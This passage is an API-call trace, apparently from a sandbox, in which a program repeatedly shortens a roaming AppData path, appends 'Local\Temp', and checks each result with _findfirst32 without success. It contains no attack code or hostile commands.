lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\Local\\Temp", lpUsedDefaultChar=0x0) returned 56 [0161.295] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\Local\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\Local\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\Local\\Temp" [0161.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\Local\\Temp", lpUsedDefaultChar=0x0) returned 56 [0161.295] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\Local\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.295] _errno () returned 0x77207d8 [0161.295] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.295] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.295] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.296] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoftLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoftLocal\\Temp", lpUsedDefaultChar=0x0) returned 55 [0161.296] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoftLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoftLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoftLocal\\Temp" [0161.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoftLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoftLocal\\Temp", lpUsedDefaultChar=0x0) returned 55 [0161.297] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoftLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.297] _errno () returned 0x77207d8 [0161.297] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.297] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.297] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.298] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microsof", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsofLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsofLocal\\Temp", lpUsedDefaultChar=0x0) returned 54 [0161.298] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsofLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsofLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsofLocal\\Temp" [0161.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsofLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsofLocal\\Temp", lpUsedDefaultChar=0x0) returned 54 [0161.298] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsofLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.298] _errno () returned 0x77207d8 [0161.298] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.298] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.298] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.298] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\microso", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoLocal\\Temp", lpUsedDefaultChar=0x0) returned 53 [0161.299] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoLocal\\Temp" [0161.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoLocal\\Temp", lpUsedDefaultChar=0x0) returned 53 [0161.299] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.299] _errno () returned 0x77207d8 [0161.299] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.299] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.299] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.299] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\micros", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsLocal\\Temp", lpUsedDefaultChar=0x0) returned 52 [0161.299] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microsLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microsLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microsLocal\\Temp" [0161.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microsLocal\\Temp", lpUsedDefaultChar=0x0) returned 52 [0161.300] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microsLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.300] _errno () returned 0x77207d8 [0161.300] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.300] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.300] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.300] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\micro", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microLocal\\Temp", lpUsedDefaultChar=0x0) returned 51 [0161.300] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\microLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\microLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\microLocal\\Temp" [0161.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\microLocal\\Temp", lpUsedDefaultChar=0x0) returned 51 [0161.301] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\microLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.301] _errno () returned 0x77207d8 [0161.301] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.301] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.301] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.302] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\micr", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\micrLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\micrLocal\\Temp", lpUsedDefaultChar=0x0) returned 50 [0161.302] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\micrLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\micrLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\micrLocal\\Temp" [0161.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\micrLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\micrLocal\\Temp", lpUsedDefaultChar=0x0) returned 50 [0161.302] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\micrLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.302] _errno () returned 0x77207d8 [0161.302] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.302] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.302] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.302] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\mic", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\micLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\micLocal\\Temp", lpUsedDefaultChar=0x0) returned 49 [0161.302] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\micLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\micLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\micLocal\\Temp" [0161.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\micLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\micLocal\\Temp", lpUsedDefaultChar=0x0) returned 49 [0161.303] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\micLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.303] _errno () returned 0x77207d8 [0161.303] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.303] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.303] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.303] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\mi", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\miLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\miLocal\\Temp", lpUsedDefaultChar=0x0) returned 48 [0161.303] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\miLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\miLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\miLocal\\Temp" [0161.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\miLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\miLocal\\Temp", lpUsedDefaultChar=0x0) returned 48 [0161.304] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\miLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.304] _errno () returned 0x77207d8 [0161.304] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.304] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.304] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.304] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\m", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\mLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\mLocal\\Temp", lpUsedDefaultChar=0x0) returned 47 [0161.304] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\mLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\mLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\mLocal\\Temp" [0161.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\mLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\mLocal\\Temp", lpUsedDefaultChar=0x0) returned 47 [0161.304] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\mLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.304] _errno () returned 0x77207d8 [0161.305] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.305] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.305] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.305] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming\\", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\Local\\Temp", lpUsedDefaultChar=0x0) returned 46 [0161.305] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaming\\Local\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaming\\Local\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaming\\Local\\Temp" [0161.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaming\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaming\\Local\\Temp", lpUsedDefaultChar=0x0) returned 46 [0161.305] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaming\\Local\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.305] _errno () returned 0x77207d8 [0161.305] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.306] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.306] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.306] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roaming", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roamingLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roamingLocal\\Temp", lpUsedDefaultChar=0x0) returned 45 [0161.306] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roamingLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roamingLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roamingLocal\\Temp" [0161.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roamingLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roamingLocal\\Temp", lpUsedDefaultChar=0x0) returned 45 [0161.306] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roamingLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.307] _errno () returned 0x77207d8 [0161.307] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.307] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.307] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.307] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roamin", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaminLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaminLocal\\Temp", lpUsedDefaultChar=0x0) returned 44 [0161.307] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaminLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaminLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaminLocal\\Temp" [0161.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaminLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaminLocal\\Temp", lpUsedDefaultChar=0x0) returned 44 [0161.307] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaminLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.307] _errno () returned 0x77207d8 [0161.308] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.308] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.308] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.308] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roami", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roamiLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roamiLocal\\Temp", lpUsedDefaultChar=0x0) returned 43 [0161.308] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roamiLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roamiLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roamiLocal\\Temp" [0161.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roamiLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roamiLocal\\Temp", lpUsedDefaultChar=0x0) returned 43 [0161.308] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roamiLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.308] _errno () returned 0x77207d8 [0161.308] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.309] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.309] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.309] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\roam", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roamLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roamLocal\\Temp", lpUsedDefaultChar=0x0) returned 42 [0161.309] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roamLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roamLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roamLocal\\Temp" [0161.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roamLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roamLocal\\Temp", lpUsedDefaultChar=0x0) returned 42 [0161.309] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roamLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.309] _errno () returned 0x77207d8 [0161.309] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.309] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.309] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.310] VarBstrCat (in: 